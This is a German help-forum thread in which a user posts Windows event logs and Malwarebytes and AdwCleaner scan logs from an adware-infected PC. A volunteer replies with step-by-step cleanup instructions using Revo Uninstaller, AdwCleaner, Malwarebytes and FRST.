Description: Programm HealerConsole.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1654

Startzeit: 01d2857673fc6d06

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files (x86)\SystemHealer\HealerConsole.exe

Berichts-ID: c93ef070-f169-11e6-b566-7824af3a6ca1

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (02/12/2017 10:23:36 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Ein kritischer Systemprozess C:\WINDOWS\system32\lsass.exe ist fehlgeschlagen mit den Statuscode 1. Der Computer muss neu gestartet werden.

Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.

Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1017) (User: )
Description: Das Zusammenstellen der Leistungsindikatorendaten vom Dienst "ASP.NET_64_2.0.50727" wurde deaktiviert, da mindestens ein Fehler von der Leistungsindikatorenbibliothek für diesen Dienst verursacht wurde. Die Fehler, die diese Aktion erzwungen haben, wurden in das Ereignisprotokoll der Anwendung geschrieben. Die Fehler müssen behoben werden, bevor die Leistungsindikatoren für diesen Dienst aktiviert werden.

Error: (02/12/2017 10:17:05 PM) (Source: Perflib) (EventID: 1022) (User: )
Description: Windows kann die 64-Bit-Version der DLL für erweiterbare Leistungsindikatoren "ASP.NET_64_2.0.50727" in einer 32-Bit-Umgebung nicht öffnen. Wenden Sie sich an den Hersteller der Datei, um eine 64-Bit-Version zu erhalten. Sie können aber auch die 64-Bit-Version der DLL für erweiterbare Leistungsindikatoren öffnen, indem Sie die 64-Bit-Version der Leistungsüberwachung verwenden. Öffnen Sie den Ordner "Windows", öffnen Sie den Ordner "Syswow64", und starten Sie "Perfmon.exe", um dieses Programm zu verwenden.

Error: (02/12/2017 10:15:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: Barbara-PC)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{bf5e4a23-94b4-4781-90ac-7c988db7e8e6}“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (02/12/2017 09:48:38 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LockAppHost.exe, Version: 10.0.14393.187, Zeitstempel: 0x57cf9d26
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.14393.479, Zeitstempel: 0x5825887f
Ausnahmecode: 0xc0000374
Fehleroffset: 0x00000000000f8283
ID des fehlerhaften Prozesses: 0x16c4
Startzeit der fehlerhaften Anwendung: 0x01d28498616b43a4
Pfad der fehlerhaften Anwendung: C:\Windows\System32\LockAppHost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 5985970f-b9c0-4538-bd10-5dde95a4174c
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Systemfehler:
=============
Error: (02/13/2017 07:05:47 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (02/12/2017 10:27:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Internet Access Button" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/12/2017 10:27:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Hayzumflex" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/12/2017 10:24:54 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (02/12/2017 10:24:52 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.

Error: (02/12/2017 10:24:51 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎12.‎02.‎2017 um 22:14:06 unerwartet heruntergefahren.

Error: (02/12/2017 10:22:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Origin Web Helper Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/12/2017 10:22:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Message Queuing" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (02/12/2017 10:22:15 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (02/12/2017 10:21:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Net.Msmq-Listeneradapter" wurde unerwartet beendet. Dies ist bereits 2 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 300000 Millisekunden durchgeführt: Neustart des Diensts.

CodeIntegrity:
===================================
Date: 2017-02-12 22:25:39.778
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:37:00.860
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:30:05.983
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-05 16:29:50.519
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-03 17:15:28.507
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-03 17:11:30.887
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-02-03 17:10:56.581
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-01-14 19:41:20.016
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-01-14 11:07:45.723
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

Date: 2017-01-13 17:19:17.372
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Xeon(R) CPU E3-1231 v3 @ 3.40GHz
Prozentuale Nutzung des RAM: 11%
Installierter physikalischer RAM: 16328.44 MB
Verfügbarer physikalischer RAM: 14422.95 MB
Summe virtueller Speicher: 32712.44 MB
Verfügbarer virtueller Speicher: 30777.72 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.35 GB) (Free:163.48 GB) NTFS
Drive d: (Daten) (Fixed) (Total:1862.89 GB) (Free:1789.88 GB) NTFS
Drive e: (Disc2) (CDROM) (Total:7.88 GB) (Free:0 GB) UDF

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 6CF6904B)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

Malwarebytes wollte keine Verbindung mit der Datenbank aufbauen, um diese zu aktualisieren. Habe trotzdem mal gescannt.
Hier das Log:

Zitat:

Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 13.02.2017
Suchlaufzeit: 19:09
Protokolldatei: mb.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.02.16.06
Rootkit-Datenbank: v2016.02.08.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Barbara

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 380788
Abgelaufene Zeit: 3 Min., 17 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 10
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care\Languages, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.OneSystemCare, C:\Users\Barbara\AppData\Roaming\One System Care\WL, In Quarantäne, [1d497de4a1f8bd79e844508d2fd3639d],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer\Languages, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\Users\Barbara\AppData\Roaming\System Healer\WL, In Quarantäne, [4422f071efaac1759033db121ee437c9],
PUP.Optional.SystemHealer, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer, In Quarantäne, [d690a2bf8b0e93a3f9cbbe2f6b970cf4],
PUP.Optional.PCCleanPlus, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Clean Plus, In Quarantäne, [3432ea775049cc6a3bed25cc4ab8c63a],
PUP.Optional.CleanBrowser, C:\Program Files (x86)\CleanBrowser, In Quarantäne, [da8c29384554d75f13ad21d0bb475ca4],
PUP.Optional.CleanBrowser, C:\Program Files (x86)\CleanBrowser\app, In Quarantäne, [da8c29384554d75f13ad21d0bb475ca4],

Dateien: 0
(keine bösartigen Elemente erkannt)

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)

(end)

Vielen Dank im Voraus für jede Hilfe...
Viele Grüße
Barbara

burningice · 13.02.2017, 19:44

Mein Name ist Rafael und ich werde dir bei der Bereinigung helfen.

Damit ich dir optimal helfen kann, halte dich bitte an folgende Regeln:

Bitte lies meine Posts komplett durch bevor du sie abarbeitest
Wenn ein Problem auftauchen sollte oder dir etwas unklar ist, unterbreche deine Arbeit und beschreibe es so genau wie möglich.
Bitte kein Crossposting
Installiere oder Deinstalliere keine Software ohne Aufforderung
Bitte verwende nur die Tools, welche hier im Thread erwähnt werden und führe sie nur gemäß Anweisung aus
Bitte antworte innerhalb von 24h um eine sinnvolle Bereinigung zu ermöglichen
Poste die Logs immer in CODE-Tags (#-Button), zur Not die Logs einfach aufteilen
Wichtig: Nur weil dein Problem mit einem Schritt plötzlich behoben ist, bedeutet das nicht, dass dein PC auch sauber ist. Mache solange weiter, bis ich dir sage, dass dein PC "clean" ist
Wir machen unsere Arbeit freiwillig und ehrenamtlich neben unserer normalen Beschäftigung im Leben. Dennoch, wenn ich dir nicht binnen 36h antworte, sende mir bitte eine persönliche Nachricht!

Los geht's

was hast du denn da bitte gemacht

Schritt 0
Lade Dir bitte von hier

Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.

Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
Klicke auf Optionen und wähle als Sprache Deutsch.
Suche im Uninstallerfeld nach den Programmen:

AppTrailers - AppTrailers for Desktop
BeCleaner version 1.0
HDWallPaper 1.0
MyMemory
One System Care
OtherSearch
PC Clean Plus
pccleanplus
SafeFinder
Search module
Social2Search
System Healer
trotux - Uninstall
youndoo - Uninstall
Malwarebytes
Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
Wähle anschließend den Modus "Moderat" aus.
Reste löschen:
Klicke auf dann auf und dann auf .

Hinweis: Falls bei der Deinstallation zu Beginn ein Fehler auftritt oder du den aufgerufenen Uninstaller nicht bedienen kannst, breche dieses Setup einfach ab und fahre mit der Entfernung durch Revo wie oben beschrieben fort.

Schritt 1
Downloade Dir bitte AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser.
Starte die adwcleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel
- "Prefetch" Dateien
- Proxy
- Winsock
- Internet Explorer Richtlinien
- Chrome Richtlinien
Bestätige die Auswahl mit Ok.
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Schritt 2
Lade dir folgendes Programm herunter und installiere es:

Malwarebytes Anti-Malware

Starte Malwarebytes' Anti-Malware (MBAM).
Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
Starte MBAM nach dem Neustart, klicke auf Berichte.
Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 3
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

Bitte poste in deiner nächsten Antwort also:

Logfile von AdwCleaner
Logfile von Malwarebytes
Frst.txt
Addition.txt

Bitte poste dein Ergebnis zwischen Code-Tags
Wenn ein Log zu lange ist, teile ihn bitte auf mehrere Antworten.

Code-Tags?

Drücke einfach die # in Antwortfenster und füge den Log dazwischen ein

BaBi · 13.02.2017, 20:54

Hallo Rafael,

vielen Dank für deine Hilfe.

AdwCleaner
AdwCleaner Logfile:

Code:

ATTFilter

# AdwCleaner v6.043 - Bericht erstellt am 13/02/2017 um 20:38:32
# Aktualisiert am 27/01/2017 von Malwarebytes
# Datenbank : 2017-02-13.1 [Server]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Barbara - BARBARA-PC
# Gestartet von : C:\Users\Barbara\Desktop\Virenscanner etc\AdwCleaner_6.043.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support



***** [ Dienste ] *****

[-] Dienst gelöscht: SMUpd
[-] Dienst gelöscht: SMUpdd
[-] Dienst gelöscht: backlh
[-] Dienst gelöscht: NetUtils2016
[-] Dienst gelöscht: NetUtils2016srv
[-] Dienst gelöscht: Nettrans
[-] Dienst gelöscht: WinSAPSvc
[-] Dienst gelöscht: iThemes5
[-] Dienst gelöscht: Hayzumflex
[-] Dienst gelöscht: Zaamla
[-] Dienst gelöscht: WinSnare


***** [ Ordner ] *****

[-] Ordner gelöscht: C:\Program Files (x86)\WinSnare(4.1.0)
[-] Ordner gelöscht: C:\ProgramData\3e6b6889-0047-0
[-] Ordner gelöscht: C:\ProgramData\3e6b6889-6d45-1
[-] Ordner gelöscht: C:\ProgramData\3e6b6889-6e95-0
[-] Ordner gelöscht: C:\ProgramData\f09cf6fd-67a5-1
[-] Ordner gelöscht: C:\ProgramData\f09cf6fd-6885-0
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Local\AppTrailers
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\PC Clean Plus
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\Event Monitor
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\gplyra
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\WinSAPSvc
[#] Ordner mit Neustart gelöscht: C:\Users\Barbara\AppData\Roaming\winsapsvc
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\WinSnare
[-] Ordner gelöscht: C:\Program Files\Common Files\Noobzo
[-] Ordner gelöscht: C:\ProgramData\SearchModule
[-] Ordner gelöscht: C:\ProgramData\Logic Handler
[-] Ordner gelöscht: C:\ProgramData\Hayzumflexs
[-] Ordner gelöscht: C:\ProgramData\NetworkPacketManitor
[-] Ordner gelöscht: C:\ProgramData\Hayzumflex
[-] Ordner gelöscht: C:\ProgramData\Zaamla
[-] Ordner gelöscht: C:\ProgramData\Zaamlas
[-] Ordner gelöscht: C:\Program Files (x86)\pccleanplus
[-] Ordner gelöscht: C:\Program Files (x86)\MIO
[-] Ordner gelöscht: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\Tencent
[-] Ordner gelöscht: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
[-] Ordner gelöscht: C:\WINDOWS\SysWoW64\sstmp
[#] Ordner mit Neustart gelöscht: C:\Users\Barbara\AppData\Roaming\WinSnare
[#] Ordner mit Neustart gelöscht: C:\Program Files (x86)\MIO


***** [ Dateien ] *****

[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\booking.ico
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\aliexpress.ico
[-] Datei gelöscht: C:\WINDOWS\SysNative\bi3.exe
[#] Datei gelöscht: C:\WINDOWS\SysNative\NetUtils2016.dll
[#] Datei gelöscht: C:\WINDOWS\SysNative\drivers\NetUtils2016.sys
[-] Datei gelöscht: C:\END
[-] Datei gelöscht: C:\ProgramData\smp2.exe
[-] Datei gelöscht: C:\TOSTACK
[#] Datei gelöscht: C:\ProgramData\smp2.exe
[-] Datei gelöscht: C:\WINDOWS\SysWoW64\NetUtils2016.exe
[-] Datei gelöscht: C:\WINDOWS\rsrcs.dll
[-] Datei gelöscht: C:\Program Files (x86)\Common Files\SERVICES\ITHEMES.DLL
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\md.xml
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\Config.xml
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\noah.dat
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\Installer.dat
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\InstallationConfiguration.xml
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\Main.dat
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\agent.dat
[-] Datei gelöscht: C:\Program Files (x86)\Internet Explorer\iexplore.bat
[-] Datei gelöscht: C:\Program Files (x86)\Mozilla Firefox\firefox.bat
[-] Datei gelöscht: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\8rnx3iua.default\searchplugins\smod.xml


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Verknüpfungen ] *****

[-] Verknüpfung desinfiziert: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk
[-] Verknüpfung desinfiziert: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search (2).lnk
[-] Verknüpfung desinfiziert: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk


***** [ Aufgabenplanung ] *****

[-] Aufgabe gelöscht: EhXuia58iw
[-] Aufgabe gelöscht: RunAtStartup
[-] Aufgabe gelöscht: RunAtStartup
[-] Aufgabe gelöscht: IBUpd2
[-] Aufgabe gelöscht: SMW_P
[-] Aufgabe gelöscht: Milimili


***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
[-] Schlüssel gelöscht: HKU\.DEFAULT\Software\jhdbca
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Installer
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\One System Care
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\System Healer
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\PC
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\Event Monitor
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\MICROSOFT\wewewe
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\WinSnare
[-] Schlüssel gelöscht: HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Software\AppDataLow\Software\AppTrailers
[#] Schlüssel mit Neustart gelöscht: HKU\S-1-5-18\Software\jhdbca
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Installer
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\One System Care
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\System Healer
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\PC
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Event Monitor
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\MICROSOFT\wewewe
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\WinSnare
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\AppDataLow\Software\AppTrailers
[-] Schlüssel gelöscht: HKLM\SOFTWARE\BrowserAir
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Jawego
[-] Schlüssel gelöscht: HKLM\SOFTWARE\SearchModule
[-] Schlüssel gelöscht: HKLM\SOFTWARE\PC
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Event Monitor
[-] Schlüssel gelöscht: HKLM\SOFTWARE\youndooSoftware
[-] Schlüssel gelöscht: HKLM\SOFTWARE\OtherSearch
[-] Schlüssel gelöscht: HKLM\SOFTWARE\trotuxSoftware
[-] Schlüssel gelöscht: HKLM\SOFTWARE\ScreenShot
[-] Schlüssel gelöscht: HKLM\SOFTWARE\jhdbca
[-] Schlüssel gelöscht: HKLM\SOFTWARE\mtHayzumflex
[-] Schlüssel gelöscht: HKLM\SOFTWARE\mtZaamla
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Installer
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\One System Care
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\System Healer
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\PC
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Event Monitor
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\MICROSOFT\wewewe
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\WinSnare
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\AppDataLow\Software\AppTrailers
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\SearchModule
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\jhdbca
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\HDWallpaper
[-] Daten  wiederhergestellt: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] 
[-] Daten  wiederhergestellt: [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] 
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\coupontime.co
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\land.pckeeper.software
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pckeeper.software
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.coupontime00.coupontime.co
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www-searching.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\coupontime.co
